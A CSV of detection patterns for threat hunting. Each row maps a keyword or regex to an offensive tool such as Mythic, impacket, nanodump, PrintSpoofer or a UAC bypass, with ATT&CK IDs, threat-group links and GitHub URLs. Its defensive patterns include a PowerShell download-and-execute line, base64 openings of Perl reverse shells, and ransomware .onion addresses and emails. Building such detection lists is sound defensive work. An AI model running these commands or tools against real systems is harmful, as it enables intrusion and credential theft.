"*IQoJb3Jpz2cXpQRkpVX3Uf*",".{0,1000}IQoJb3Jpz2cXpQRkpVX3Uf.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","49930"
"*irc.pico.sh*",".{0,1000}irc\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","49931"
"*IReversePortForwardService.*",".{0,1000}IReversePortForwardService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","49932"
"*irkjanm/krbrelayx*",".{0,1000}irkjanm\/krbrelayx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","49933"
"*irm unit259.fyi/dbgui | iex*",".{0,1000}irm\sunit259\.fyi\/dbgui\s\|\siex.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","49934"
"*irs.exe -*",".{0,1000}irs\.exe\s\-.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","49935"
"*irs.exe exec*",".{0,1000}irs\.exe\sexec.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","49936"
"*irs.exe list*",".{0,1000}irs\.exe\slist.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","49937"
"*irs.exe list*",".{0,1000}irs\.exe\slist.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","49938"
"*irsl/curlshell*",".{0,1000}irsl\/curlshell.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","49939"
"*is needed to run the DefenderRemover *",".{0,1000}is\sneeded\sto\srun\sthe\sDefenderRemover\s.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","49940"
"*is_binary_in_gtfobins(*",".{0,1000}is_binary_in_gtfobins\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","49941"
"*is_kirbi_file*",".{0,1000}is_kirbi_file.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","49942"
"*is_proxy_stub_dll_loaded*",".{0,1000}is_proxy_stub_dll_loaded.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","49943"
"*iscsicpl autoelevate DLL Search Order hijacking UAC Bypass*",".{0,1000}iscsicpl\sautoelevate\sDLL\sSearch\sOrder\shijacking\sUAC\sBypass.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#content","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","49944"
"*iscsicpl_BypassUAC_x86.exe*",".{0,1000}iscsicpl_BypassUAC_x86\.exe.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","1","N/A","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","49945"
"*ISecurityEditorUAC_off.exe*",".{0,1000}ISecurityEditorUAC_off\.exe.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","1","N/A","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","49946"
"*isShellcodeThread*",".{0,1000}isShellcodeThread.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","49947"
"*issue_shell_whoami*",".{0,1000}issue_shell_whoami.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","49948"
"*it will extract domain controller private key through RPC uses it to decrypt all credentials*",".{0,1000}it\swill\sextract\sdomain\scontroller\sprivate\skey\sthrough\sRPC\suses\sit\sto\sdecrypt\sall\scredentials.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","49949"
"*It2H@Qp3Xe*sxdc#KA8)dbMtI5Q7&FK*",".{0,1000}It2H\@Qp3Xe.{0,1000}sxdc\#KA8\)dbMtI5Q7\&FK.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","49950"
"*Itay Migdal*",".{0,1000}Itay\sMigdal.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","49952"
"*itaymigdal/LOLSpoof*",".{0,1000}itaymigdal\/LOLSpoof.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","49953"
"*itaymigdal/Poshito*",".{0,1000}itaymigdal\/Poshito.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","1","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","49954"
"*it-gorillaz/lnk2pwn*",".{0,1000}it\-gorillaz\/lnk2pwn.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","49955"
"*ithelp07@decorous.cyou*",".{0,1000}ithelp07\@decorous\.cyou.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","49956"
"*ithelp07@wholeness.business*",".{0,1000}ithelp07\@wholeness\.business.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","49957"
"*itm4n/Perfusion*",".{0,1000}itm4n\/Perfusion.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","49958"
"*itm4n/PPLmedic*",".{0,1000}itm4n\/PPLmedic.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","49959"
"*itm4n/PrintSpoofer*",".{0,1000}itm4n\/PrintSpoofer.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","49960"
"*itm4n/PrintSpoofer*",".{0,1000}itm4n\/PrintSpoofer.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","49961"
"*itm4n/PrivescCheck*",".{0,1000}itm4n\/PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49962"
"*itm4nprivesc*",".{0,1000}itm4nprivesc.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49963"
"*its-a-feature/Apfell*",".{0,1000}its\-a\-feature\/Apfell.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","49964"
"*its-a-feature/Mythic*",".{0,1000}its\-a\-feature\/Mythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","49965"
"*its-a-feature/Mythic*",".{0,1000}its\-a\-feature\/Mythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","49966"
"*ItsNee/Follina-CVE-2022-30190-POC*",".{0,1000}ItsNee\/Follina\-CVE\-2022\-30190\-POC.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z","49967"
"*itunes_backup2john.pl*",".{0,1000}itunes_backup2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","49968"
"*itwasalladream -u * -p * -d *",".{0,1000}itwasalladream\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","N/A","7","8","796","123","2024-05-19T16:25:52Z","2021-07-05T20:13:49Z","49969"
"*itwasalladream*bogus.dll*",".{0,1000}itwasalladream.{0,1000}bogus\.dll.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","N/A","7","8","796","123","2024-05-19T16:25:52Z","2021-07-05T20:13:49Z","49970"
"*ItWasAllADream-master*",".{0,1000}ItWasAllADream\-master.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","N/A","7","8","796","123","2024-05-19T16:25:52Z","2021-07-05T20:13:49Z","49971"
"*IUnknownObj.cpp*",".{0,1000}IUnknownObj\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","49972"
"*IvanGlinkin/AutoSUID*",".{0,1000}IvanGlinkin\/AutoSUID.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","1","N/A","N/A","7","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","49973"
"*ivan-sincek/php-reverse-shell*",".{0,1000}ivan\-sincek\/php\-reverse\-shell.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","49974"
"*ivre-masscan/*",".{0,1000}ivre\-masscan\/.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","49975"
"*Ivy_1*_darwin_amd64*",".{0,1000}Ivy_1.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","#linux","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","49976"
"*Ivy_1*_linux_amd64*",".{0,1000}Ivy_1.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","#linux","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","49977"
"*Ivy_1*_windows_amd64.exe*",".{0,1000}Ivy_1.{0,1000}_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","49978"
"*Ivy-main.zip*",".{0,1000}Ivy\-main\.zip.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","1","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","49979"
"*iw6v2p3cruy7tqfup3yl4dgt4pfibfa3ai4zgnu5df2q3hus3lm7c7ad.onion*",".{0,1000}iw6v2p3cruy7tqfup3yl4dgt4pfibfa3ai4zgnu5df2q3hus3lm7c7ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","49980"
"*iwantmore.pizza/posts/PEzor.html*",".{0,1000}iwantmore\.pizza\/posts\/PEzor\.html.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","49981"
"*iwork2john.py*",".{0,1000}iwork2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","49982"
"*IyEvdXNyL2Jpbi9lbnYgcHl0aG9uMwppbXBvcnQgZG5zLnJlc29sdmVyCmltcG9ydCBvcwppbXBvcnQgcmFuZG9tCmltcG9ydCB0aW1lCgo=*",".{0,1000}IyEvdXNyL2Jpbi9lbnYgcHl0aG9uMwppbXBvcnQgZG5zLnJlc29sdmVyCmltcG9ydCBvcwppbXBvcnQgcmFuZG9tCmltcG9ydCB0aW1lCgo\=.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#base64","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","49984"
"*IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lO*",".{0,1000}IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lO.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","49985"
"*IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX*",".{0,1000}IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","49986"
"*j.jasonm@yandex.com*",".{0,1000}j\.jasonm\@yandex\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","49987"
"*j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad.onion*",".{0,1000}j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","49988"
"*JAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ASwBEAG8AdAAyADIANwAvA*",".{0,1000}JAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ASwBEAG8AdAAyADIANwAvA.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","49989"
